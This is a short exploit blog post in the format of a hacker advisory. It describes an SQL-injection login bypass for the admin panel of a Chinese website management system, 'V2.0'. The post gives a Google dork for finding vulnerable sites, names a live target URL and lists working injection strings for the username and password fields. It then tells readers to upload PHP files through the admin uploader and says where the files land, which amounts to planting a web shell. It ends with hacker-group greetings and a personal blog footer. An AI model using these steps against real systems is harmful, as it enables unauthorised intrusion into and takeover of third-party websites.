[+]Exploit Title: China Bypass SQL Admin Login
[+]Author: Extazy Kun
[+]Team: -1
[+]Goolge Dork:
融和集团 网站后台管理系统 V2.0 intext:/admin/login.php
[+]Tested on: Linux
=======================================
[+]Proof Of Concept:
Dorking with the dork and get some vuln site
Live Target :
http://www.ronghe.net.cn/admin/login.php
Exploit the login details with credential like this
user : '="or'
password : '="or'
&
user: ' or 1=1 limit 1 -- -+
password: ' or 1=1 limit 1 -- -+
No need to write user,email,password. Go to the uploader and upload a php files
Your file will go to site/ypathfile/
Greetz: Omest - Marshall - Ndra - Wahyudi - Inyour Good - Lool 00T - Conqueror Of Death - Vijune15 - Sylvertar - Yolanz - Tuyul Botak - Deathinote - 3XP3T4S1 - Gladys - 3RRoR -Yudachipoi - Sarkevih
Extazy Kun 
Hello, my name is Faizal Acbar. I'm just a lazy person who wants to spend time with a simple blog.
Tidak ada komentar:
Posting Komentar
Komentar denggan sopan :')